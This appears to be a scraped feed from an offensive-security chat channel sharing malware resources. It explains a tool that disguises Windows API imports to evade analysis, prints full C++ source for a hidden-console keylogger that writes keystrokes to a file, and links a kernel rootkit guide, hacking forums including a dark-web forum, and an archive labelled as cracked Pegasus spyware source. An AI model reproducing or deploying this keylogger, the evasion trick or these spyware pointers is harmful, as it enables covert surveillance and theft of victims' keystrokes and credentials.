`This's pretty forward, let's say I've used VirtualProtect and I want to obfuscate it with Sleep, the tool will manipulate the IAT so that the thunk that points to VirtualProtect will point instead to Sleep, now at executing the file, windows loader will load Sleep instead of VirtualProtect, and moves the execution to the entry point, from there the execution will be redirected to the shellcode, the tool put before, to find the address of VirtualProtect and use it to replace the address of Sleep which assigned before by the loader.
https://github.com/d35ha/CallObfuscator
GitHub
GitHub - d35ha/CallObfuscator: Obfuscate specific windows apis with different apis
Obfuscate specific windows apis with different apis - d35ha/CallObfuscator
🤓1
👍1
Source Byte
Loggy is a keylogger that is created in C++ https://github.com/Black0utDev/Loggy
simple one i wrote
#include <Windows.h>
#include <iostream>
#include <fstream>
#include <stdio.h>
#include <string>
using namespace std;
void WriteToLog(LPCSTR text)
{
ofstream logFile;
logFile.open("Keys.txt", fstream::app);
// logFile << text;
logFile.close();
}
int main()
{
char key;
while (TRUE)
{
ShowWindow(GetConsoleWindow(), 0);
Sleep(10);
for (key = 0x8; key <= 0xBE; key++)
{
if (GetAsyncKeyState(key) == -32767)
{
ofstream logFile;
logFile.open("Keys.txt", fstream::app);
logFile << key;
logFile.close();
}
}
}
return 0;
}
❤🔥2
Introduction to stack management in x86-64 architecture for Windows
(credits @3shw4r)
offensivecraft.wordpress.com…
#stack , #windows , #stack_managment
(credits @3shw4r)
offensivecraft.wordpress.com…
#stack , #windows , #stack_managment
CodeMachine - Windows Kernel Rootkit Techniques-unlocked.pdf
5.2 MB
CodeMachine - Windows Kernel Rootkit Techniques
Most operating systems support kernel-mode device drivers, which execute with the same privileges as the operating system itself. As such, many kernel
https://www.coursefather.com/2023/12/Windows-rootkits-kernel.html?m=1
Most operating systems support kernel-mode device drivers, which execute with the same privileges as the operating system itself. As such, many kernel
https://www.coursefather.com/2023/12/Windows-rootkits-kernel.html?m=1
❤1
#froum
https://bbs.kafan.cn/
https://bbs.pediy.com/
http://club.vfocus.net/index.php
https://www.xf1433.com/
https://www.52pojie.cn/forum.php
https://www.77169.net/
https://bbs.mayidui.net/
https://www.5566.net/
https://forum.butian.net/
https://unsafe.sh/
http://xssforumv3isucukbxhdhwz67hoa5e2voakcfkuieq4ch257vsburuid.onion/threads/65150/
https://bbs.kafan.cn/
https://bbs.pediy.com/
http://club.vfocus.net/index.php
https://www.xf1433.com/
https://www.52pojie.cn/forum.php
https://www.77169.net/
https://bbs.mayidui.net/
https://www.5566.net/
https://forum.butian.net/
https://unsafe.sh/
http://xssforumv3isucukbxhdhwz67hoa5e2voakcfkuieq4ch257vsburuid.onion/threads/65150/
bbs.kafan.cn
卡饭论坛_最好的软件论坛_讨论 - 互助分享 - 大气谦和!
是国内最著名的软件论坛,友善,热情,开放的讨论氛围,首屈一指,打造国内最好的软件交流平台!
❤🔥1
Pegasus-Cracked_By_Fsociety_Source_Code.rar
139.2 MB
Pegasus-cracked
#pegasus
#pegasus
Online C++ to Assembly Converter
(+) CodeConvert
(+) Compiler Explorer
(+) Code Beautify
(+) C to VSCPU ASM Converter
(+) ConV
(+) CtoAssembly
#reverse #useful
(+) CodeConvert
(+) Compiler Explorer
(+) Code Beautify
(+) C to VSCPU ASM Converter
(+) ConV
(+) CtoAssembly
#reverse #useful
❤🔥1